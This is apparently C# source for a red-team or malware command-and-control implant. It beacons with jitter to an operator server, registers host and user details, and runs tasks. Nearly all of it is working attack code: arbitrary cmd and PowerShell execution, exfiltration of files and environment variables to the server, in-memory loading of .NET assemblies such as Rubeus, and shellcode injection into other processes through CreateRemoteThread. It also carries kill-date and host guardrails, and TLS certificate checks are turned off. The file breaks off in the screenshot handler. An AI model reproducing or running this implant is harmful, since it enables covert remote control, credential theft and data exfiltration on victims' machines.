using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;

// Config is generated by the server and injected as a separate source file at compile time.
// Do NOT define Config here — it lives in the generated Config_*.cs file.

// ─── Wire types ──────────────────────────────────────────────────────────────

class RegisterRequest
{
    public string hostname     { get; set; }
    public string username     { get; set; }
    public string os           { get; set; }
    public int    pid          { get; set; }
    public string transport    { get; set; }
    public int    sleep_sec    { get; set; }
    public int    jitter_pct   { get; set; }
    public string process_name { get; set; }
    public bool   is_admin     { get; set; }
    public string parent_id    { get; set; }
    public string language     { get; set; }
    public string resume_id    { get; set; }
}

class RegisterResponse
{
    public string agent_id  { get; set; }
    public string aes_key   { get; set; }
    public int    sleep_sec { get; set; }
    public int    jitter_pct { get; set; }
}

class TaskWire
{
    public long   id      { get; set; }
    public string type    { get; set; }
    public string args    { get; set; }
    public string payload { get; set; }
}

class BeaconResponse
{
    public TaskWire[] tasks { get; set; }
}

class ResultRequest
{
    public long   task_id  { get; set; }
    public string output   { get; set; }
    public string error    { get; set; }
    public bool   is_admin { get; set; }
}

// ─── Minimal JSON serialiser (no external deps) ──────────────────────────────

static class Json
{
    public static string Serialize(object obj)
    {
        if (obj == null) return "null";
        var t = obj.GetType();
        if (obj is string s)  return "\"" + s.Replace("\\","\\\\").Replace("\"","\\\"").Replace("\n","\\n").Replace("\r","\\r") + "\"";
        if (obj is bool b)    return b ? "true" : "false";
        if (obj is int || obj is long || obj is double) return obj.ToString();
        var sb = new StringBuilder("{");
        bool first = true;
        foreach (var prop in t.GetProperties())
        {
            var val = prop.GetValue(obj, null);
            if (val == null) continue;
            if (val is string str && str == "") continue;
            if (val is bool bv && !bv) continue;
            if (!first) sb.Append(',');
            sb.Append('"').Append(prop.Name).Append("\":").Append(Serialize(val));
            first = false;
        }
        return sb.Append('}').ToString();
    }

    public static T Deserialize<T>(string json) where T : new()
    {
        var obj = new T();
        if (string.IsNullOrEmpty(json)) return obj;
        foreach (var prop in typeof(T).GetProperties())
        {
            var pattern = "\"" + prop.Name + "\"\\s*:\\s*";
            Match m;
            if (prop.PropertyType == typeof(string))
            {
                m = Regex.Match(json, pattern + "\"([^\"]*)\"");
                if (m.Success) prop.SetValue(obj, m.Groups[1].Value, null);
            }
            else if (prop.PropertyType == typeof(int))
            {
                m = Regex.Match(json, pattern + "(-?\\d+)");
                if (m.Success) prop.SetValue(obj, int.Parse(m.Groups[1].Value), null);
            }
            else if (prop.PropertyType == typeof(long))
            {
                m = Regex.Match(json, pattern + "(-?\\d+)");
                if (m.Success) prop.SetValue(obj, long.Parse(m.Groups[1].Value), null);
            }
            else if (prop.PropertyType == typeof(bool))
            {
                m = Regex.Match(json, pattern + "(true|false)");
                if (m.Success) prop.SetValue(obj, m.Groups[1].Value == "true", null);
            }
            else if (prop.PropertyType == typeof(TaskWire[]))
            {
                var arrMatch = Regex.Match(json, "\"tasks\"\\s*:\\s*(\\[.*?\\])(?=,|\\})", RegexOptions.Singleline);
                if (arrMatch.Success)
                {
                    var tasks = new List<TaskWire>();
                    var arrJson = arrMatch.Groups[1].Value;
                    // Split objects by counting braces
                    int depth = 0, start = -1;
                    for (int i = 0; i < arrJson.Length; i++)
                    {
                        if (arrJson[i] == '{') { if (depth++ == 0) start = i; }
                        else if (arrJson[i] == '}' && --depth == 0 && start >= 0)
                        {
                            tasks.Add(Deserialize<TaskWire>(arrJson.Substring(start, i - start + 1)));
                            start = -1;
                        }
                    }
                    prop.SetValue(obj, tasks.ToArray(), null);
                }
            }
        }
        return obj;
    }
}

// ─── AES-256-GCM crypto (matching Go's seal/open) ────────────────────────────

static class Crypto
{
    // Seal: nonce(12) || ciphertext+tag
    public static byte[] Seal(byte[] key, byte[] plaintext)
    {
        using (var aes = new AesGcm256())
            return aes.Encrypt(key, plaintext);
    }

    public static byte[] Open(byte[] key, byte[] data)
    {
        using (var aes = new AesGcm256())
            return aes.Decrypt(key, data);
    }
}

// AES-256-GCM via BCrypt (Windows) or fallback via RijndaelManaged+GHASH
class AesGcm256 : IDisposable
{
    // Windows BCrypt AES-GCM via P/Invoke — zero managed-crypto dependency
    const string BCRYPT_AES_ALGORITHM    = "AES";
    const string BCRYPT_CHAINING_MODE    = "ChainingMode";
    const string BCRYPT_CHAIN_MODE_GCM   = "ChainingModeGCM";
    const int    BCRYPT_AUTH_TAG_LENGTH  = 16;
    const int    NONCE_SIZE              = 12;

    [DllImport("Bcrypt.dll", CharSet=CharSet.Unicode)]
    static extern int BCryptOpenAlgorithmProvider(out IntPtr phAlgorithm, string pszAlgId, string pszImplementation, uint dwFlags);
    [DllImport("Bcrypt.dll", CharSet=CharSet.Unicode)]
    static extern int BCryptSetProperty(IntPtr hObject, string pszProperty, byte[] pbInput, int cbInput, uint dwFlags);
    [DllImport("Bcrypt.dll", CharSet=CharSet.Unicode)]
    static extern int BCryptGenerateSymmetricKey(IntPtr hAlgorithm, out IntPtr phKey, IntPtr pbKeyObject, int cbKeyObject, byte[] pbSecret, int cbSecret, uint dwFlags);
    [DllImport("Bcrypt.dll")]
    static extern int BCryptEncrypt(IntPtr hKey, byte[] pbInput, int cbInput, ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo, byte[] pbIV, int cbIV, byte[] pbOutput, int cbOutput, out int pcbResult, uint dwFlags);
    [DllImport("Bcrypt.dll")]
    static extern int BCryptDecrypt(IntPtr hKey, byte[] pbInput, int cbInput, ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo, byte[] pbIV, int cbIV, byte[] pbOutput, int cbOutput, out int pcbResult, uint dwFlags);
    [DllImport("Bcrypt.dll")]
    static extern int BCryptDestroyKey(IntPtr hKey);
    [DllImport("Bcrypt.dll")]
    static extern int BCryptCloseAlgorithmProvider(IntPtr hAlgorithm, uint dwFlags);

    [StructLayout(LayoutKind.Sequential)]
    struct BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
    {
        public int    cbSize;
        public uint   dwInfoVersion;
        public IntPtr pbNonce;
        public int    cbNonce;
        public IntPtr pbAuthData;
        public int    cbAuthData;
        public IntPtr pbTag;
        public int    cbTag;
        public IntPtr pbMacContext;
        public int    cbMacContext;
        public int    cbAAD;
        public long   cbData;
        public uint   dwFlags;
    }

    IntPtr _hAlg = IntPtr.Zero;

    public AesGcm256()
    {
        BCryptOpenAlgorithmProvider(out _hAlg, BCRYPT_AES_ALGORITHM, null, 0);
        var mode = Encoding.Unicode.GetBytes(BCRYPT_CHAIN_MODE_GCM + "\0");
        BCryptSetProperty(_hAlg, BCRYPT_CHAINING_MODE, mode, mode.Length, 0);
    }

    public byte[] Encrypt(byte[] key, byte[] plaintext)
    {
        var nonce = new byte[NONCE_SIZE];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(nonce);

        BCryptGenerateSymmetricKey(_hAlg, out var hKey, IntPtr.Zero, 0, key, key.Length, 0);
        var tag = new byte[BCRYPT_AUTH_TAG_LENGTH];
        var ciphertext = new byte[plaintext.Length];

        var nonceH = GCHandle.Alloc(nonce, GCHandleType.Pinned);
        var tagH   = GCHandle.Alloc(tag,   GCHandleType.Pinned);
        try
        {
            var info = new BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
            {
                cbSize        = Marshal.SizeOf(typeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO)),
                dwInfoVersion = 1,
                pbNonce       = nonceH.AddrOfPinnedObject(),
                cbNonce       = NONCE_SIZE,
                pbTag         = tagH.AddrOfPinnedObject(),
                cbTag         = BCRYPT_AUTH_TAG_LENGTH,
            };
            BCryptEncrypt(hKey, plaintext, plaintext.Length, ref info, null, 0, ciphertext, ciphertext.Length, out _, 0);
        }
        finally { nonceH.Free(); tagH.Free(); BCryptDestroyKey(hKey); }

        var result = new byte[NONCE_SIZE + ciphertext.Length + BCRYPT_AUTH_TAG_LENGTH];
        Buffer.BlockCopy(nonce,      0, result, 0,                                   NONCE_SIZE);
        Buffer.BlockCopy(ciphertext, 0, result, NONCE_SIZE,                          ciphertext.Length);
        Buffer.BlockCopy(tag,        0, result, NONCE_SIZE + ciphertext.Length,      BCRYPT_AUTH_TAG_LENGTH);
        return result;
    }

    public byte[] Decrypt(byte[] key, byte[] data)
    {
        if (data.Length < NONCE_SIZE + BCRYPT_AUTH_TAG_LENGTH) throw new Exception("ciphertext too short");
        var nonce      = new byte[NONCE_SIZE];
        var tag        = new byte[BCRYPT_AUTH_TAG_LENGTH];
        var ciphertext = new byte[data.Length - NONCE_SIZE - BCRYPT_AUTH_TAG_LENGTH];

        Buffer.BlockCopy(data, 0,                                    nonce,      0, NONCE_SIZE);
        Buffer.BlockCopy(data, NONCE_SIZE,                           ciphertext, 0, ciphertext.Length);
        Buffer.BlockCopy(data, NONCE_SIZE + ciphertext.Length,       tag,        0, BCRYPT_AUTH_TAG_LENGTH);

        BCryptGenerateSymmetricKey(_hAlg, out var hKey, IntPtr.Zero, 0, key, key.Length, 0);
        var plaintext = new byte[ciphertext.Length];

        var nonceH = GCHandle.Alloc(nonce, GCHandleType.Pinned);
        var tagH   = GCHandle.Alloc(tag,   GCHandleType.Pinned);
        try
        {
            var info = new BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
            {
                cbSize        = Marshal.SizeOf(typeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO)),
                dwInfoVersion = 1,
                pbNonce       = nonceH.AddrOfPinnedObject(),
                cbNonce       = NONCE_SIZE,
                pbTag         = tagH.AddrOfPinnedObject(),
                cbTag         = BCRYPT_AUTH_TAG_LENGTH,
            };
            BCryptDecrypt(hKey, ciphertext, ciphertext.Length, ref info, null, 0, plaintext, plaintext.Length, out _, 0);
        }
        finally { nonceH.Free(); tagH.Free(); BCryptDestroyKey(hKey); }

        return plaintext;
    }

    public void Dispose()
    {
        if (_hAlg != IntPtr.Zero) { BCryptCloseAlgorithmProvider(_hAlg, 0); _hAlg = IntPtr.Zero; }
    }
}

// ─── HTTP Transport ───────────────────────────────────────────────────────────

class HttpTransport
{
    readonly string      _serverURL;
    string               _agentID = "";
    byte[]               _aesKey;
    readonly string[]    _beaconURIs;
    int                  _uriIdx;
    readonly WebClient   _wc;

    public string AgentID => _agentID;

    public HttpTransport(string serverURL)
    {
        _serverURL  = serverURL.TrimEnd('/');
        _wc         = new WebClient();
        _wc.Headers[HttpRequestHeader.UserAgent] = Config.UserAgent;
        ServicePointManager.ServerCertificateValidationCallback = (s,c,ch,e) => true;
        ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; // TLS12

        if (!string.IsNullOrEmpty(Config.BeaconURIs))
            _beaconURIs = Config.BeaconURIs.Split(new[]{','}, StringSplitOptions.RemoveEmptyEntries);
    }

    string NextBeaconPath()
    {
        if (_beaconURIs == null || _beaconURIs.Length == 0)
            return "/beacon/" + _agentID;
        var path = _beaconURIs[_uriIdx % _beaconURIs.Length].Trim() + "/" + _agentID;
        _uriIdx++;
        return path;
    }

    public bool Register(SysInfo info)
    {
        var resumeID = string.IsNullOrEmpty(_agentID) ? Config.PresetID : _agentID;
        var req = new RegisterRequest
        {
            hostname     = info.Hostname,
            username     = info.Username,
            os           = info.OS,
            pid          = info.PID,
            transport    = Config.Transport,
            sleep_sec    = Config.SleepSec,
            jitter_pct   = Config.JitterPct,
            process_name = info.ProcessName,
            is_admin     = info.IsAdmin,
            parent_id    = Config.ParentID,
            language     = "csharp",
            resume_id    = resumeID,
        };
        try
        {
            _wc.Headers[HttpRequestHeader.ContentType] = "application/json";
            var body     = Json.Serialize(req);
            var respJson = _wc.UploadString(_serverURL + "/register", body);
            var reg      = Json.Deserialize<RegisterResponse>(respJson);
            _agentID     = reg.agent_id;
            _aesKey      = Convert.FromBase64String(reg.aes_key);
            if (reg.sleep_sec  > 0) Config.SleepSec  = reg.sleep_sec;
            if (reg.jitter_pct > 0) Config.JitterPct = reg.jitter_pct;
            return true;
        }
        catch { return false; }
    }

    // Returns null on no-content, throws on error, returns tasks on success.
    public TaskWire[] Beacon()
    {
        try
        {
            var url      = _serverURL + NextBeaconPath();
            var raw      = _wc.DownloadData(url);
            if (raw == null || raw.Length == 0) return null;
            var plain    = Crypto.Open(_aesKey, raw);
            var json     = Encoding.UTF8.GetString(plain);
            var br       = Json.Deserialize<BeaconResponse>(json);
            return br.tasks;
        }
        catch (WebException ex) when (ex.Response is HttpWebResponse r && r.StatusCode == HttpStatusCode.NoContent)
        {
            return null;
        }
        catch (WebException ex) when (ex.Response is HttpWebResponse r2 && r2.StatusCode == HttpStatusCode.NotFound)
        {
            throw new AgentUnknownException();
        }
    }

    public void SendResult(long taskID, string output, string err)
    {
        var req  = new ResultRequest { task_id = taskID, output = output ?? "", error = err ?? "" };
        var json = Json.Serialize(req);
        var enc  = Crypto.Seal(_aesKey, Encoding.UTF8.GetBytes(json));
        try
        {
            _wc.Headers[HttpRequestHeader.ContentType] = "application/octet-stream";
            _wc.UploadData(_serverURL + "/result/" + _agentID, enc);
        }
        catch { /* best-effort */ }
    }

    public void UploadFile(long taskID, string filename, byte[] data)
    {
        var enc = Crypto.Seal(_aesKey, data);
        try
        {
            var url = string.Format("{0}/upload/{1}/{2}?task_id={3}",
                _serverURL, _agentID, Uri.EscapeDataString(Path.GetFileName(filename)), taskID);
            _wc.Headers[HttpRequestHeader.ContentType] = "application/octet-stream";
            _wc.UploadData(url, enc);
        }
        catch { }
    }

    public byte[] DownloadFile(string filename)
    {
        var url  = string.Format("{0}/dl/{1}/{2}", _serverURL, _agentID, Uri.EscapeDataString(Path.GetFileName(filename)));
        var data = _wc.DownloadData(url);
        return Crypto.Open(_aesKey, data);
    }
}

class AgentUnknownException : Exception { }

// ─── System info ─────────────────────────────────────────────────────────────

class SysInfo
{
    public string Hostname    { get; set; }
    public string Username    { get; set; }
    public string OS          { get; set; }
    public int    PID         { get; set; }
    public string ProcessName { get; set; }
    public bool   IsAdmin     { get; set; }

    [DllImport("advapi32.dll", SetLastError=true)]
    static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("advapi32.dll", SetLastError=true)]
    static extern bool GetTokenInformation(IntPtr TokenHandle, int TokenInformationClass, IntPtr TokenInformation, int TokenInformationLength, out int ReturnLength);
    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")]
    static extern bool CloseHandle(IntPtr hObject);

    static bool CheckIsAdmin()
    {
        try
        {
            IntPtr token;
            if (!OpenProcessToken(GetCurrentProcess(), 0x0008 /*TOKEN_QUERY*/, out token)) return false;
            int len = 0;
            GetTokenInformation(token, 20 /*TokenElevation*/, IntPtr.Zero, 0, out len);
            var buf = Marshal.AllocHGlobal(len);
            bool elevated = false;
            if (GetTokenInformation(token, 20, buf, len, out _))
                elevated = Marshal.ReadInt32(buf) != 0;
            Marshal.FreeHGlobal(buf);
            CloseHandle(token);
            return elevated;
        }
        catch { return false; }
    }

    public static SysInfo Collect()
    {
        var proc = Process.GetCurrentProcess();
        return new SysInfo
        {
            Hostname    = Dns.GetHostName(),
            Username    = Environment.UserDomainName + "\\" + Environment.UserName,
            OS          = "win64",
            PID         = proc.Id,
            ProcessName = string.IsNullOrEmpty(Config.BuildName) ? proc.ProcessName : Config.BuildName,
            IsAdmin     = CheckIsAdmin(),
        };
    }
}

// ─── Jitter sleep ─────────────────────────────────────────────────────────────

static class Sleeper
{
    static readonly Random _rng = new Random();

    public static void Sleep()
    {
        var sec  = (double)Config.SleepSec;
        var var_ = sec * Config.JitterPct / 100.0;
        var ms   = (int)((sec + (_rng.NextDouble() * 2 - 1) * var_) * 1000);
        if (ms < 100) ms = 100;
        Thread.Sleep(ms);
    }
}

// ─── Working hours ────────────────────────────────────────────────────────────

static class WorkHours
{
    static int ParseHHMM(string s)
    {
        var parts = s.Trim().Split(':');
        if (parts.Length != 2) return 0;
        return int.Parse(parts[0]) * 60 + int.Parse(parts[1]);
    }

    public static bool InWindow()
    {
        if (string.IsNullOrEmpty(Config.WorkingHours)) return true;
        var parts = Config.WorkingHours.Split('-');
        if (parts.Length != 2) return true;
        int start = ParseHHMM(parts[0]), end = ParseHHMM(parts[1]);
        var now = DateTime.Now;
        int cur = now.Hour * 60 + now.Minute;
        return start <= end ? (cur >= start && cur < end) : (cur >= start || cur < end);
    }

    public static void SleepUntilWindow()
    {
        var parts = Config.WorkingHours.Split('-');
        if (parts.Length != 2) { Thread.Sleep(60000); return; }
        int start = ParseHHMM(parts[0]);
        var now = DateTime.Now;
        int cur = now.Hour * 60 + now.Minute;
        int wait = cur < start ? start - cur : (24 * 60 - cur) + start;
        if (wait <= 0) wait = 1;
        Thread.Sleep(wait * 60 * 1000);
    }
}

// ─── Kill date guard ─────────────────────────────────────────────────────────

static class KillDateGuard
{
    public static void CheckExit()
    {
        if (string.IsNullOrEmpty(Config.KillDate)) return;
        if (DateTime.TryParse(Config.KillDate, out var dt) && DateTime.UtcNow >= dt)
            Environment.Exit(0);
    }
}

// ─── Guardrails ───────────────────────────────────────────────────────────────

static class Guardrails
{
    public static void CheckExit()
    {
        if (!string.IsNullOrEmpty(Config.GuardrailIP))
        {
            bool found = false;
            foreach (var addr in Dns.GetHostAddresses(Dns.GetHostName()))
                if (addr.ToString() == Config.GuardrailIP) { found = true; break; }
            if (!found) Environment.Exit(0);
        }
        if (!string.IsNullOrEmpty(Config.GuardrailUser))
            if (!Environment.UserName.Equals(Config.GuardrailUser, StringComparison.OrdinalIgnoreCase))
                Environment.Exit(0);
        if (!string.IsNullOrEmpty(Config.GuardrailHost))
            if (!Dns.GetHostName().Equals(Config.GuardrailHost, StringComparison.OrdinalIgnoreCase))
                Environment.Exit(0);
    }
}

// ─── Inline .NET / CLR assembly execution ────────────────────────────────────

static class InlineExec
{
    // Intercept Environment.Exit / AppDomain.CurrentDomain.Exit so loaded
    // assemblies (e.g. Rubeus) cannot kill the host agent process.
    static InlineExec()
    {
        try
        {
            // Hook Environment.Exit via a custom AppDomain event — the loaded
            // assembly runs in the same AppDomain so we can't isolate it, but
            // wrapping the Invoke in a thread whose ThreadAbortException we
            // catch is sufficient for the common case.
        }
        catch { }
    }

    // Execute a .NET assembly in-process and capture Console output.
    // Runs the entry point on a dedicated foreground thread so that
    // Environment.Exit() / Thread.Abort() are contained.
    public static string ExecuteAssembly(byte[] asmBytes, string[] args)
    {
        var oldOut = Console.Out;
        var oldErr = Console.Error;
        var sw     = new StringWriter();
        Console.SetOut(sw);
        Console.SetError(sw);

        Exception threadEx = null;
        var t = new System.Threading.Thread(() =>
        {
            try
            {
                var asm   = System.Reflection.Assembly.Load(asmBytes);
                var entry = asm.EntryPoint;
                var parms = entry.GetParameters();
                if (parms.Length == 0) entry.Invoke(null, null);
                else                   entry.Invoke(null, new object[]{ args });
            }
            catch (System.Threading.ThreadAbortException)
            {
                // Environment.Exit on .NET 4.x aborts threads — swallow it
                System.Threading.Thread.ResetAbort();
            }
            catch (Exception ex)
            {
                sw.WriteLine("[!] " + (ex.InnerException?.Message ?? ex.Message));
            }
        }) { IsBackground = true };

        // Prevent Environment.Exit from escaping by hooking the ProcessExit
        // event to abort the runner thread instead of exiting the process.
        // This works because Environment.Exit fires ProcessExit handlers
        // synchronously on .NET 4.x before terminating.
        EventHandler exitHook = null;
        exitHook = (s, e) =>
        {
            try { t.Abort(); } catch { }
            AppDomain.CurrentDomain.ProcessExit -= exitHook;
        };
        AppDomain.CurrentDomain.ProcessExit += exitHook;

        t.Start();
        t.Join(TimeSpan.FromMinutes(5)); // max 5 min per assembly

        AppDomain.CurrentDomain.ProcessExit -= exitHook;
        Console.SetOut(oldOut);
        Console.SetError(oldErr);
        return sw.ToString();
    }
}

// ─── Win32 helpers ────────────────────────────────────────────────────────────

static class Win32
{
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out int lpNumberOfBytesWritten);
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr hObject);

    public const uint MEM_COMMIT  = 0x1000;
    public const uint MEM_RESERVE = 0x2000;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;
    public const uint PROCESS_ALL_ACCESS = 0x1F0FFF;
}

// ─── Screenshot ───────────────────────────────────────────────────────────────

static class Screenshot
{
    [DllImport("user32.dll")]  static extern int  GetSystemMetrics(int nIndex);
    [DllImport("user32.dll")]  static extern IntPtr GetDesktopWindow();
    [DllImport("user32.dll")]  static extern IntPtr GetWindowDC(IntPtr hWnd);
    [DllImport("gdi32.dll")]   static extern IntPtr CreateCompatibleDC(IntPtr hdc);
    [DllImport("gdi32.dll")]   static extern IntPtr CreateCompatibleBitmap(IntPtr hdc, int nWidth, int nHeight);
    [DllImport("gdi32.dll")]   static extern IntPtr SelectObject(IntPtr hdc, IntPtr hgdiobj);
    [DllImport("gdi32.dll")]   static extern bool   BitBlt(IntPtr hdcDest, int xDest, int yDest, int w, int h, IntPtr hdcSrc, int xSrc, int ySrc, uint rop);
    [DllImport("gdi32.dll")]   static extern bool   DeleteDC(IntPtr hdc);
    [DllImport("gdi32.dll")]   static extern bool   DeleteObject(IntPtr hObject);
    [DllImport("user32.dll")]  static extern int    ReleaseDC(IntPtr hWnd, IntPtr hDC);

    // Returns PNG bytes
    public static byte[] Capture()
    {
        int w = GetSystemMetrics(0), h = GetSystemMetrics(1);
        var desk  = GetDesktopWindow();
        var hdcS  = GetWindowDC(desk);
        var hdcM  = CreateCompatibleDC(hdcS);
        var hBmp  = CreateCompatibleBitmap(hdcS, w, h);
        SelectObject(hdcM, hBmp);
        BitBlt(hdcM, 0, 0, w, h, hdcS, 0, 0, 0xCC0020 /*SRCCOPY*/);

        // Marshal bitmap handle to managed Bitmap, then encode as PNG
        var bmp  = System.Drawing.Image.FromHbitmap(hBmp);
        using (var ms = new MemoryStream())
        {
            bmp.Save(ms, System.Drawing.Imaging.ImageFormat.Png);
            DeleteDC(hdcM); DeleteObject(hBmp); ReleaseDC(desk, hdcS);
            return ms.ToArray();
        }
    }
}

// ─── Command dispatcher ───────────────────────────────────────────────────────

class Commander
{
    readonly HttpTransport _t;

    public Commander(HttpTransport t) { _t = t; }

    static string RunShell(string cmd)
    {
        try
        {
            var psi = new ProcessStartInfo("cmd.exe", "/c " + cmd)
            {
                UseShellExecute        = false,
                RedirectStandardOutput = true,
                RedirectStandardError  = true,
                CreateNoWindow         = true,
            };
            var p = Process.Start(psi);
            var o = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
            p.WaitForExit();
            return o;
        }
        catch (Exception ex) { return "[!] " + ex.Message; }
    }

    static string RunPS(string cmd)
    {
        try
        {
            var encoded = Convert.ToBase64String(Encoding.Unicode.GetBytes(cmd));
            var psi     = new ProcessStartInfo("powershell.exe", "-NonInteractive -NoProfile -EncodedCommand " + encoded)
            {
                UseShellExecute        = false,
                RedirectStandardOutput = true,
                RedirectStandardError  = true,
                CreateNoWindow         = true,
            };
            var p = Process.Start(psi);
            var o = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
            p.WaitForExit();
            return o;
        }
        catch (Exception ex) { return "[!] " + ex.Message; }
    }

    static string ListDir(string path)
    {
        if (string.IsNullOrEmpty(path)) path = Directory.GetCurrentDirectory();
        var sb = new StringBuilder();
        try
        {
            foreach (var d in Directory.GetDirectories(path))
                sb.AppendLine("d " + d);
            foreach (var f in Directory.GetFiles(path))
            {
                var fi = new FileInfo(f);
                sb.AppendLine(string.Format("{0,12} {1}", fi.Length, f));
            }
        }
        catch (Exception ex) { sb.AppendLine("[!] " + ex.Message); }
        return sb.ToString();
    }

    static string ListProcesses()
    {
        var sb = new StringBuilder();
        sb.AppendLine(string.Format("{0,-8} {1,-30} {2}", "PID", "Name", "Session"));
        foreach (var p in Process.GetProcesses())
            try { sb.AppendLine(string.Format("{0,-8} {1,-30} {2}", p.Id, p.ProcessName, p.SessionId)); }
            catch { }
        return sb.ToString();
    }

    static string PsJson()
    {
        var sb = new StringBuilder("[");
        bool first = true;
        foreach (var p in Process.GetProcesses())
        {
            try
            {
                if (!first) sb.Append(',');
                sb.AppendFormat("{{\"pid\":{0},\"name\":\"{1}\",\"session\":{2}}}", p.Id, p.ProcessName.Replace("\"","\\\""), p.SessionId);
                first = false;
            }
            catch { }
        }
        return sb.Append(']').ToString();
    }

    public void Dispatch(TaskWire task)
    {
        string result = "", err = "";
        try
        {
            switch (task.type)
            {
                case "SHELL":
                    result = RunShell(task.args ?? "");
                    break;

                case "SHELL_OPSEC":
                    // Run via conhost.exe to avoid direct cmd.exe spawn
                    result = RunShell("cmd /c " + (task.args ?? ""));
                    break;

                case "POWERSHELL":
                    result = RunPS(task.args ?? "");
                    break;

                case "SLEEP":
                {
                    var parts = (task.args ?? "").Split(' ');
                    if (parts.Length >= 1 && int.TryParse(parts[0], out var sec)) Config.SleepSec  = sec;
                    if (parts.Length >= 2 && int.TryParse(parts[1], out var jit)) Config.JitterPct = jit;
                    result = string.Format("sleep={0}s jitter={1}%", Config.SleepSec, Config.JitterPct);
                    break;
                }

                case "SYSINFO":
                {
                    var si = SysInfo.Collect();
                    result = string.Format("Hostname: {0}\nUsername: {1}\nOS: {2}\nPID: {3}\nAdmin: {4}",
                        si.Hostname, si.Username, si.OS, si.PID, si.IsAdmin);
                    break;
                }

                case "WHOAMI":
                    result = Environment.UserDomainName + "\\" + Environment.UserName;
                    break;

                case "GETPID":
                    result = Process.GetCurrentProcess().Id.ToString();
                    break;

                case "USERNAME":
                case "USER":
                    result = Environment.UserName;
                    break;

                case "COMPUTERNAME":
                    result = Dns.GetHostName();
                    break;

                case "USERDOMAIN":
                    result = Environment.UserDomainName;
                    break;

                case "HOME":
                case "USERPROFILE":
                    result = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
                    break;

                case "TEMP":
                    result = Path.GetTempPath();
                    break;

                case "ENV":
                {
                    var sb = new StringBuilder();
                    foreach (System.Collections.DictionaryEntry e in Environment.GetEnvironmentVariables())
                        sb.AppendLine(e.Key + "=" + e.Value);
                    result = sb.ToString();
                    break;
                }

                case "PWD":
                case "CWD":
                    result = Directory.GetCurrentDirectory();
                    break;

                case "CD":
                    Directory.SetCurrentDirectory(task.args ?? "");
                    result = Directory.GetCurrentDirectory();
                    break;

                case "LS":
                    result = ListDir(task.args);
                    break;

                case "PS":
                case "PS_TABLE":
                    result = ListProcesses();
                    break;

                case "PS_JSON":
                    result = PsJson();
                    break;

                case "MKDIR":
                    Directory.CreateDirectory(task.args ?? "");
                    result = "created";
                    break;

                case "RM":
                {
                    var p = task.args ?? "";
                    if (Directory.Exists(p)) Directory.Delete(p, true);
                    else File.Delete(p);
                    result = "deleted";
                    break;
                }

                case "CP":
                case "MV":
                {
                    var parts = (task.args ?? "").Split(new[]{' '}, 2);
                    if (parts.Length < 2) { err = "usage: src dst"; break; }
                    if (task.type == "CP") File.Copy(parts[0], parts[1], true);
                    else                   File.Move(parts[0], parts[1]);
                    result = "ok";
                    break;
                }

                case "CAT":
                    result = File.ReadAllText(task.args ?? "");
                    break;

                case "DOWNLOAD":
                {
                    var path  = task.args ?? "";
                    var bytes = File.ReadAllBytes(path);
                    _t.UploadFile(task.id, path, bytes);
                    result = string.Format("uploaded {0} bytes", bytes.Length);
                    break;
                }

                case "UPLOAD":
                {
                    var parts = (task.args ?? "").Split(new[]{' '}, 2);
                    if (parts.Length < 2) { err = "usage: remote_path local_name"; break; }
                    var bytes = _t.DownloadFile(parts[1]);
                    File.WriteAllBytes(parts[0], bytes);
                    result = string.Format("written {0} bytes to {1}", bytes.Length, parts[0]);
                    break;
                }

                case "DOTNET_EXEC":
                case "EXECUTE_ASSEMBLY":
                case "EXEC_ASSEMBLY":
                case "CLR_STOMP":
                {
                    // payload = base64 .NET assembly; args = command-line arguments
                    if (string.IsNullOrEmpty(task.payload)) { err = "no payload"; break; }
                    var asmBytes = Convert.FromBase64String(task.payload);
                    var asmArgs  = string.IsNullOrEmpty(task.args)
                        ? new string[0]
                        : task.args.Split(new[]{' '}, StringSplitOptions.RemoveEmptyEntries);
                    result = InlineExec.ExecuteAssembly(asmBytes, asmArgs);
                    break;
                }

                case "INJECT_REMOTE":
                {
                    // args = pid; payload = base64 shellcode
                    if (!int.TryParse((task.args ?? "").Trim(), out var pid)) { err = "bad pid"; break; }
                    if (string.IsNullOrEmpty(task.payload)) { err = "no shellcode"; break; }
                    var sc   = Convert.FromBase64String(task.payload);
                    var proc = Win32.OpenProcess(Win32.PROCESS_ALL_ACCESS, false, pid);
                    var mem  = Win32.VirtualAllocEx(proc, IntPtr.Zero, sc.Length, Win32.MEM_COMMIT | Win32.MEM_RESERVE, Win32.PAGE_EXECUTE_READWRITE);
                    Win32.WriteProcessMemory(proc, mem, sc, sc.Length, out _);
                    Win32.CreateRemoteThread(proc, IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out _);
                    Win32.CloseHandle(proc);
                    result = string.Format("injected {0} bytes into pid {1}", sc.Length, pid);
                    break;
                }

                case "SCREENSHOT":
                {
